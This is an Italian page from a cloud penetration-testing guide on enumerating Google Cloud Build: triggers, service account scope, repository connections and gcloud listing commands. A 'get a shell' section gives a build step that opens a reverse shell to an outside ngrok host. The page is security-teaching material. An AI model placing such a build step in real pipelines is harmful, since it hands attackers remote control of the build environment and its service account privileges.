GCP - Cloud Build Enum

Informazioni di Base

Google Cloud Build è una piattaforma CI/CD gestita che automatizza i processi di build e rilascio del software, integrandosi con repository di codice sorgente e supportando un'ampia gamma di linguaggi di programmazione. Permette agli sviluppatori di costruire, testare e distribuire codice automaticamente fornendo flessibilità per personalizzare i passaggi di build e i flussi di lavoro.

Ogni Cloud Build Trigger è relazionato a un Cloud Repository o direttamente collegato a un repository esterno (Github, Bitbucket e Gitlab).

Eventi

Il Cloud Build può essere attivato se:

• Push su un branch: Specificare il branch

• Push di un nuovo tag: Specificare il tag

• Pull request: Specificare il branch che riceve il PR

• Invocazione manuale

• Messaggio Pub/Sub: Specificare l'argomento

• Evento Webhook: Esporterà un URL HTTPS e la richiesta deve essere autenticata con un segreto

Esecuzione

Ci sono 3 opzioni:

• Un yaml/json che specifica i comandi da eseguire. Di solito: /cloudbuild.yaml

• Solo uno che può essere specificato "inline" nella console web e nel cli

• Opzione più comune

• Rilevante per accesso non autenticato

• Un Dockerfile da costruire

• Un Buildpack da costruire

Permessi SA

Il Service Account ha l'ambito cloud-platform, quindi può usare tutti i privilegi. Se non viene specificato alcun SA (come quando si fa submit) verrà utilizzato il SA predefinito <proj-number>@cloudbuild.gserviceaccount.com.

Di default non vengono concessi permessi ma è abbastanza facile assegnarne alcuni:

Approvazioni

È possibile configurare un Cloud Build per richiedere approvazioni per le esecuzioni di build (disabilitato di default).

Approvazioni PR

Quando il trigger è PR, poiché chiunque può eseguire PR su repository pubblici, sarebbe molto pericoloso permettere l'esecuzione del trigger con qualsiasi PR. Pertanto, di default, l'esecuzione sarà automatica solo per proprietari e collaboratori, e per eseguire il trigger con PR di altri utenti un proprietario o collaboratore deve commentare /gcbrun.

Connessioni & Repositories

Le connessioni possono essere create su:

• GitHub: Mostrerà un prompt OAuth chiedendo permessi per ottenere un token Github che verrà memorizzato all'interno del Secret Manager.

• GitHub Enterprise: Chiederà di installare un GithubApp. Verrà creato e memorizzato in questo progetto un token di autenticazione dal tuo host GitHub Enterprise come un segreto del Secret Manager.

• GitLab / Enterprise: Devi fornire il token di accesso API e il token di accesso Read API che verranno memorizzati nel Secret Manager.

Una volta generata una connessione, puoi usarla per collegare repository a cui l'account Github ha accesso.

Questa opzione è disponibile tramite il pulsante:

Collegare un Repository

Questo non è lo stesso di una connessione. Questo permette diversi modi per ottenere accesso a un repository Github o Bitbucket ma non genera un oggetto connessione, bensì genera un oggetto repository (di 1a generazione).

Questa opzione è disponibile tramite il pulsante:

Storage

A volte Cloud Build genererà un nuovo storage per memorizzare i file per il trigger. Questo accade, ad esempio, nell'esempio che GCP offre con:

git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global

Un bucket di Storage chiamato security-devbox_cloudbuild è creato per memorizzare un .tgz con i file da utilizzare.

Ottenere una shell

steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY

Install gcloud inside cloud build:

Installare gcloud all'interno di cloud build:

# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image
curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz
mkdir -p /usr/local/gcloud
tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz
/usr/local/gcloud/google-cloud-sdk/install.sh

Enumerazione

Potresti trovare informazioni sensibili nelle configurazioni di build e nei log.

# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>

# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs

# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done

# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done

Privilege Escalation

Unauthenticated Access

Post Exploitation